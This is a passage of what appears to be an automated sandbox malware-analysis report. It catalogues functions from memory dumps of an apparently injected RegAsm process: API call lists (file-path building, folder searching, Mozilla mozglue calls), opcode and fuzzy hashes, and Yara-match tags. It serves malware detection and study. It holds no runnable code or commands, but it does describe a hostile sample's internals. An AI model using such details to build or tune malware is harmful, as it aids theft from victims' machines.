                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fgetc$memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1522623862-0
                                                                                                                                                                                                                                                    • Opcode ID: eb9ab84d7dc5573d3a669fbba7cc4b35a0331e39f64bc6ea7f3216ec57c77c3d
                                                                                                                                                                                                                                                    • Instruction ID: eae0530acc4691eb2fcf4f184beaa5a83a45dc1ad54e41c4e44551a10e0b9f1c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb9ab84d7dc5573d3a669fbba7cc4b35a0331e39f64bc6ea7f3216ec57c77c3d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5361FB71A00208CFDB24DFA8D980AAEBBF1FF49316F144529E802A7651CB31E944CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C729F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C729FDB
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C729FF0
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A006
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C72A0BE
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A0D5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A0EB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                                                                                                    • Opcode ID: a1523d4e1798afab7dcf92415da25f16765259ff5023e5c4e7b8ce66e722d3cc
                                                                                                                                                                                                                                                    • Instruction ID: 1bb37419b131c3288b9317c4652a27e0a1f2c5e5878a9e6ad029b709c7587618
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1523d4e1798afab7dcf92415da25f16765259ff5023e5c4e7b8ce66e722d3cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B161A0759087019FC711CF18C58059AB7F5FF89328F54866DE8A99B702EB32E986CBC1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411E50 Relevance: 9.1, APIs: 6, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00411E90
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427158,?,?,?,00000000), ref: 00411EDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,0042715C,00000000,?,?,?,00000000), ref: 00411F22
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427160,?,?,?,00000000), ref: 00411F4E
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427164,?,?,?,00000000), ref: 00411F7A
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00411FAC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3330995566-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e3c077772cb1b54c778a9d9a72cb82904c094e46690486c00dcf859865b5ed7
                                                                                                                                                                                                                                                    • Instruction ID: e0a9f33a4a34958a6c202544b1f7cfd695b5de89789079ef0fe45b4d6ddf3efb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3c077772cb1b54c778a9d9a72cb82904c094e46690486c00dcf859865b5ed7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E419E74A04205DFC710DF59D844FF6B7A8FF09304F60466FE606932A0D778AA69CB59
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72DC60
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C72D38A,?), ref: 6C72DC6F
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C72D38A,?), ref: 6C72DCC1
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C72D38A,?), ref: 6C72DCE9
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C72D38A,?), ref: 6C72DD05
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C72D38A,?), ref: 6C72DD4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                                                                                                    • Opcode ID: eca8bf161384bb5bfa5d2012baf138bd11dd85b79b5889e60733cc144b6c07cc
                                                                                                                                                                                                                                                    • Instruction ID: e591bbbcf2d8b7b932c9f78089d16e600cc8c27d040d7f475871b0db05d72011
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eca8bf161384bb5bfa5d2012baf138bd11dd85b79b5889e60733cc144b6c07cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41ACB5A00605CFCB00CFA9C984AAABBF6FF88314B554469D906ABB10DB35FC40CF94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0041BB37 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0041BB45
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: __mtinitlocknum.LIBCMT ref: 0041A539
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: __amsg_exit.LIBCMT ref: 0041A545
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082,?,?,0041918B,00000000,0042D448,004191D2,0040FB00), ref: 0041A54D
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(0042D3D0,00000020,0041BC88,00000000,00000001,00000000,?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D), ref: 0041BB81
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BB92
                                                                                                                                                                                                                                                      • Part of subcall function 0041B10A: EncodePointer.KERNEL32(00000000,0041ECDC,00640400,00000314,00000000,?,?,?,?,?,0041BE9F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B10C
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBB8
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBCB
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBD5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2005412495-0
                                                                                                                                                                                                                                                    • Opcode ID: a1d53e66ac4443d2c4de71bdad7688b77588669171ed69ac1ce67625bd559654
                                                                                                                                                                                                                                                    • Instruction ID: 55ebfb874deead2f6fb9d722ab405013791dbb2abe2ba0218b52d44de12da04b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d53e66ac4443d2c4de71bdad7688b77588669171ed69ac1ce67625bd559654
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29313970A0031ADFEF10AFA5D9856DDBAB2FB09314F14402FE510A6261DBBC59D1CFA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C72C82D
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C72C842
                                                                                                                                                                                                                                                      • Part of subcall function 6C72CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C74B5EB,00000000), ref: 6C72CB12
                                                                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C72C863
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C72C875
                                                                                                                                                                                                                                                      • Part of subcall function 6C70B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C74B636,?), ref: 6C70B143
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C72C89A
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C72C8BC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2745304114-0
                                                                                                                                                                                                                                                    • Opcode ID: 7cf136dce7fda523b1c8803b83e2f3e92088543170fa68f400222b67ca68ddb1
                                                                                                                                                                                                                                                    • Instruction ID: 76899da2c030f5767de576def5a2f5b9800e20b471cbfda266c4f848de8fe888
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf136dce7fda523b1c8803b83e2f3e92088543170fa68f400222b67ca68ddb1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8211B271B003099BCB00DFA5C9898BEBBB8FF89355F500139E60697381DF34A908CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0041A910 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041A91C
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __getptd_noexit.LIBCMT ref: 0041B277
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __amsg_exit.LIBCMT ref: 0041B284
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0041A93C
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0041A94C
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0041A969
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0041A97C
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(0042E1C0), ref: 0041A994
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                                                                                                    • Opcode ID: 886b7e99d58f603fde3bec38b80c7b87bb4c54ec2945dde3249c2adc313b75fc
                                                                                                                                                                                                                                                    • Instruction ID: 30ffa34c3c70ebfb0eab91916ffb2bbec6ae5b413d5e5c47108456d103ae39c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 886b7e99d58f603fde3bec38b80c7b87bb4c54ec2945dde3249c2adc313b75fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E01A171A12611EBDB20AF6694057DEB760AF00724F4A455BF814A7290C73C5EE2CBDF
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411720 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(015D2120,?,00000104,00000000,?,00412305,?,015D2120,00000000), ref: 0041172D
                                                                                                                                                                                                                                                    • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,015D2120,00000000,00000000,?,00412305,?,015D2120,00000000), ref: 0041174B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00412305,?,015D2120,00000000,?,?,?,?,?,?,?,00000000), ref: 0041175E
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00411771
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                                    • API String ID: 1206339513-4107738187
                                                                                                                                                                                                                                                    • Opcode ID: a9548b08038c0fc44c48867440eb6fc0a0477b7397d02b2d201bef1645a726e9
                                                                                                                                                                                                                                                    • Instruction ID: d0445b250bb9e9ffac54d7fa7f404b50c12eb4d96c707baefcfdc3b0a4e578e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9548b08038c0fc44c48867440eb6fc0a0477b7397d02b2d201bef1645a726e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F096766042187FD7104F5DFC88DA7BBEEEF89764F10512AF918C7341C6319C0086A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71E8B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C71EA9B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockRelease
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)
                                                                                                                                                                                                                                                    • API String ID: 1766480654-1136413219
                                                                                                                                                                                                                                                    • Opcode ID: e8c3181b5d445d6218904a16b343a7b1b9d806ee3b8d10db7ca4538875b88050
                                                                                                                                                                                                                                                    • Instruction ID: 0db78ff96a126d3acdf8fb9f6df0908558216239b9e02d2c3f9a8de08129884f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c3181b5d445d6218904a16b343a7b1b9d806ee3b8d10db7ca4538875b88050
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41E4717042089FDB409F15C94CBA677F9FB86318FA8003AE92587F90DF31A945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004171E0 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000104,015D20F0), ref: 00417257
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0041727E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041729E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004172B2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015C4138), ref: 004172C5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004172D9
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1748), ref: 004172ED
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00416FCE
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: HeapAlloc.KERNEL32(00000000), ref: 00416FD5
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: wsprintfA.USER32 ref: 00416FEE
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: FindFirstFileA.KERNEL32(?,?), ref: 00417005
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 167551676-0
                                                                                                                                                                                                                                                    • Opcode ID: ff81af64f3d3ee4ae71a454b1230c4fcf09eb2e4090a3d087d4681c0d8800c51
                                                                                                                                                                                                                                                    • Instruction ID: 553be2cdf8f16ee5d95c7c79b92d2a396468843d0ad9a53a05e7d035d860c6b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff81af64f3d3ee4ae71a454b1230c4fcf09eb2e4090a3d087d4681c0d8800c51
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB41C3B1800218ABCB15FBA0DC86FDD7778AB0C714F40459EF615A7191DB78A788CFA4
